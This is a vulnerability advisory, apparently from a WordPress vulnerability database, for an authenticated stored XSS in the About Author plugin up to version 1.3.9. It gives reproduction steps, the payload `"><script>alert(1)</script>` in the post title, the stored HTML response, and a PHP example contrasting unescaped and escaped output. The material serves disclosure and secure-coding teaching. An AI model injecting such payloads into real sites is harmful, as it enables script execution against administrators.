About Author <= 1.3.9 - Authenticated Stored Cross-Site Scripting (XSS)



Description
The WordPress About Author plugin, version 1.3.9 and earlier, is affected by an authenticated stored cross-site scripting (XSS) vulnerability.
Proof of Concept
Stored Cross-site scripting (XSS):

- Using a WordPress user, access `<your_target>/wp-admin/post-new.php?post_type=about_author` (About Author > Add new)
- In the post_title input, insert the following payload: `"><script>alert(1)</script>`
- Save. The stored cross-site scripting (XSS) vulnerability affects all pages/routes within the WordPress admin panel.

Stored response output:

```html
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```
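The response above shows the post title written into the `<option>` element without output escaping. As an added example (a hypothetical reconstruction, not the plugin's source code), the PHP below puts that pattern beside an escaped version. The function names and sample rows are constructed, and `escape_for_html()` is a stand-in for WordPress's `esc_html()` so the file runs without WordPress loaded.

```php
<?php
// Added example: hypothetical reconstruction, not the About Author plugin's code.
// Constructed sample rows using the IDs and titles visible in the stored response.
$posts = [
    ['ID' => 5748, 'post_title' => 'wqddqwqd'],
    ['ID' => 5749, 'post_title' => 'ads'],
    ['ID' => 5751, 'post_title' => '"><script>alert(1)</script>'],
];

// Stand-in for WordPress esc_html(); encodes <, >, &, and both quote characters.
function escape_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern: the stored title is concatenated into markup as-is.
function render_options_unescaped(array $posts): string
{
    $html = '';
    foreach ($posts as $post) {
        $html .= "<option value='" . $post['ID'] . "'>" . $post['post_title'] . "</option>";
    }
    return $html;
}

// Hardened pattern: cast the ID to an integer and escape the title at output time.
function render_options_escaped(array $posts): string
{
    $html = '';
    foreach ($posts as $post) {
        $html .= sprintf(
            "<option value='%d'>%s</option>",
            (int) $post['ID'],
            escape_for_html($post['post_title'])
        );
    }
    return $html;
}

$unsafe = render_options_unescaped($posts);
$safe   = render_options_escaped($posts);

// Regression check: fail if a literal script tag survives the escaped renderer.
if (stripos($safe, '<script') !== false) {
    throw new RuntimeException('unescaped markup in rendered options');
}
echo "unescaped: ", $unsafe, PHP_EOL;
echo "escaped:   ", $safe, PHP_EOL;
```

In a real plugin the same change would be made at the point where the admin-panel `<select>` is printed, since escaping on output also neutralises titles that are already stored.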

Affects Plugin

fixed in version 1.4.0

References

URL https://nitesculucian.github.io/2019/10/25/about-author-1-3-9-authentificated-stored-xss-vulnerability/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter LucianNitescu
Views 3997
Verified No
WPVDB ID 9930

Timeline

Publicly Published 2019-10-25 (9 months ago)
Added 2019-10-28 (8 months ago)
Last Updated 2019-11-28 (7 months ago)
